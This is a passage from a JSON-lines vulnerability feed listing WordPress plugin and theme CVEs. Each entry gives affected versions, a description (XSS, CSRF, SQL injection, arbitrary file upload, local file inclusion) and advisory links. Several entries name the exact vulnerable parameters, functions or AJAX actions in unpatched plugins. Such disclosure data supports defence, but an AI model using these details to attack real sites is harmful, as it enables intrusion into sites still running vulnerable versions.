replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-share-with-floating-bar\\\/tags\\\/1.0.3\\\/inc\\\/class-social-share-with-floating-bar-settings.php#L312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-share-with-floating-bar\\\/tags\\\/1.0.3\\\/inc\\\/class-social-share-with-floating-bar-settings.php#L312\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11645","slug":"float-block","versionImpact":"1.7","description":"The float block WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13156","slug":"html5-video-player","versionImpact":"2.5.35","description":"The HTML5 Video Player \u2013 mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018heading\u2019 parameter in all versions up to, and including, 2.5.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/dist\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/dist\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221089\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221089\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/html5-video-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/html5-video-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b26af2-d559-49bf-841a-1974360b3ad6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b26af2-d559-49bf-841a-1974360b3ad6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0860","slug":"vr-frases","versionImpact":"3.0.1","description":"The VR-Frases (collect & share quotes) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ea3e03-fafa-431e-b1fe-a527f491da79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ea3e03-fafa-431e-b1fe-a527f491da79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2577","slug":"bitspecter-suite","versionImpact":"1.0.0","description":"The Bitspecter Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bitspecter-suite\\\/trunk\\\/includes\\\/Hardening\\\/BitspecterSuiteHardening.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bitspecter-suite\\\/trunk\\\/includes\\\/Hardening\\\/BitspecterSuiteHardening.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259470\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259470\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bitspecter-suite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bitspecter-suite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f35be-fbd1-4063-a1c8-a8e4398d8f0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f35be-fbd1-4063-a1c8-a8e4398d8f0a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1303","slug":"wc-checkout-getnet","versionImpact":"1.7.3","description":"The Plugin Oficial WordPress plugin through 1.7.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35181798-4f21-4c8d-bb6e-61eb13683a74\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35181798-4f21-4c8d-bb6e-61eb13683a74\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3781","slug":"raisely-donation-form","versionImpact":"1.0","description":"The Raisely Donation Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's raisely_donation_form shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/raisely-donation-form\\\/trunk\\\/inc\\\/base\\\/providers\\\/shortcodes.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/raisely-donation-form\\\/trunk\\\/inc\\\/base\\\/providers\\\/shortcodes.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/raisely-donation-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/raisely-donation-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0716485b-e94b-4e09-9c01-1059017bfcc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0716485b-e94b-4e09-9c01-1059017bfcc8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-53260","slug":"file-manager-plugin-for-wordpress","versionImpact":"7.5","description":"Unrestricted Upload of File with Dangerous Type vulnerability in getredhawkstudio File Manager Plugin For Wordpress allows Upload a Web Shell to a Web Server. This issue affects File Manager Plugin For Wordpress: from n\/a through 7.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/file-manager-plugin-for-wordpress\\\/vulnerability\\\/wordpress-file-manager-plugin-for-wordpress-plugin-7-5-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/file-manager-plugin-for-wordpress\\\/vulnerability\\\/wordpress-file-manager-plugin-for-wordpress-plugin-7-5-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47145","slug":"blockonomics-bitcoin-payments","versionImpact":"3.5.7","description":"Reflected Cross-Site Scripting (XSS) vulnerability in Blockonomics WordPress Bitcoin Payments \u2013 Blockonomics plugin <= 3.5.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/blockonomics-bitcoin-payments\\\/wordpress-wordpress-bitcoin-payments-blockonomics-plugin-3-5-7-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/blockonomics-bitcoin-payments\\\/wordpress-wordpress-bitcoin-payments-blockonomics-plugin-3-5-7-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2496","slug":"go_pricing","versionImpact":"3.3.19","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized arbitrary file uploads due to an improper capability check on the 'validate_upload' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477c6fa2-16a8-4461-b4d4-d087e13e3ca7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477c6fa2-16a8-4461-b4d4-d087e13e3ca7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0993","slug":"wp-simple-firewall","versionImpact":"17.0.17","description":"The Shield Security plugin for WordPress is vulnerable to Missing Authorization on the 'theme-plugin-file' AJAX action in versions up to, and including, 17.0.17. This allows authenticated attackers to add arbitrary audit log entries indicating that a theme or plugin has been edited, and is also a vector for Cross-Site Scripting via CVE-2023-0992.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/674461ad-9b61-48c4-af2a-5dfcaeb38215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/674461ad-9b61-48c4-af2a-5dfcaeb38215?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2082","slug":"buymeacoffee","versionImpact":"3.6","description":"The \"Buy Me a Coffee \u2013 Button and Widget Plugin\" plugin for WordPress is vulnerable to Cross-Site Scripting in versions up to, and including, 3.6 due to insufficient sanitization and escaping on the 'text' value set via the bmc_post_reception action. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts into pages that execute whenever a victim accesses a page with the injected scripts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fbuymeacoffee%2Ftags%2F3.6&old=2922493&new_path=%2Fbuymeacoffee%2Ftags%2F3.7&new=2922493&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fbuymeacoffee%2Ftags%2F3.6&old=2922493&new_path=%2Fbuymeacoffee%2Ftags%2F3.7&new=2922493&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9f8948-085b-4ac5-befd-c70085aa23cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9f8948-085b-4ac5-befd-c70085aa23cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0898","slug":"chat-bubble","versionImpact":"2.3","description":"The Chat Bubble \u2013 Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chat-bubble\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chat-bubble\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7689","slug":"snapshot-backup","versionImpact":"2.1.1","description":"The Snapshot Backup WordPress plugin through 2.1.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4463785c-55db-4f86-80a2-ada4d2241e5e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4463785c-55db-4f86-80a2-ada4d2241e5e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8282","slug":"ibtana-visual-editor","versionImpact":"1.2.4.4","description":"The Ibtana \u2013 WordPress Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 attribute within the 'wp:ive\/ive-productscarousel' Gutenberg block in all versions up to, and including, 1.2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a281774-226a-4cb7-ba4a-ebb76f20eb47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a281774-226a-4cb7-ba4a-ebb76f20eb47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ibtana-visual-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ibtana-visual-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160421\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160421\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8740","slug":"getresponse","versionImpact":"2.5.6","description":"The GetResponse Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d14f45-4c30-4225-998d-f4f829e09bc0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d14f45-4c30-4225-998d-f4f829e09bc0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getresponse\\\/tags\\\/2.4.1\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getresponse\\\/tags\\\/2.4.1\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11002","slug":"inpost-gallery","versionImpact":"2.1.4.2","description":"The InPost Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution via the inpost_gallery_get_shortcode_template AJAX action in all versions up to, and including, 2.1.4.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inpost-gallery\\\/trunk\\\/index.php#L323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inpost-gallery\\\/trunk\\\/index.php#L323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192113\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192113\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inpost-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inpost-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11644","slug":"wp-svg","versionImpact":"0.9","description":"The WP-SVG WordPress plugin through 0.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13758","slug":"cp-contact-form-with-paypal","versionImpact":"1.3.52","description":"The CP Contact Form with PayPal plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.52. This is due to missing or incorrect nonce validation on the cp_contact_form_paypal_check_init_actions() function. This makes it possible for unauthenticated attackers to add discount codes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-contact-form-with-paypal\\\/trunk\\\/cp_contactformpp_functions.php#L616\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-contact-form-with-paypal\\\/trunk\\\/cp_contactformpp_functions.php#L616\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230873\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230873\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cp-contact-form-with-paypal\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cp-contact-form-with-paypal\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/495183b6-dc7c-4ff7-bc99-fc05a10d1269?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/495183b6-dc7c-4ff7-bc99-fc05a10d1269?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13726","slug":"tc-ecommerce","versionImpact":"1.3.4","description":"The Coder WordPress plugin through 1.3.4 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec226d22-0c09-4e7c-86ec-b64819089b60\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec226d22-0c09-4e7c-86ec-b64819089b60\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1289","slug":"wc-checkout-getnet","versionImpact":"1.7.3","description":"The Plugin Oficial WordPress plugin through 1.7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a296b59-f305-49a2-88b8-fca998f2c43e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a296b59-f305-49a2-88b8-fca998f2c43e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3750","slug":"network-posts-extended","versionImpact":"7.7.1","description":"The Network Posts Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018post_height\u2019 parameter in all versions up to, and including, 7.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/network-posts-extended\\\/trunk\\\/network-posts-extended.php#L663\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/network-posts-extended\\\/trunk\\\/network-posts-extended.php#L663\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/network-posts-extended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/network-posts-extended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64a15397-0bd6-4be9-90e3-6cb1f56394ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64a15397-0bd6-4be9-90e3-6cb1f56394ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52811","slug":"davenport","versionImpact":"1.3","description":"Path Traversal vulnerability in Creanncy Davenport - Versatile Blog and Magazine WordPress Theme allows PHP Local File Inclusion. This issue affects Davenport - Versatile Blog and Magazine WordPress Theme: from n\/a through 1.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/davenport\\\/vulnerability\\\/wordpress-davenport-versatile-blog-and-magazine-wordpress-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/davenport\\\/vulnerability\\\/wordpress-davenport-versatile-blog-and-magazine-wordpress-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7852","slug":"wpbookit","versionImpact":"1.0.6","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_new_customer' route in all versions up to, and including, 1.0.6. The plugin\u2019s image-upload handler calls move_uploaded_file() on client-supplied files without restricting allowed extensions or MIME types, nor sanitizing the filename. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php#L362\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php#L362\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3331165\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3331165\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0bb11092-4367-4f51-9dd7-22fbd655a03f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\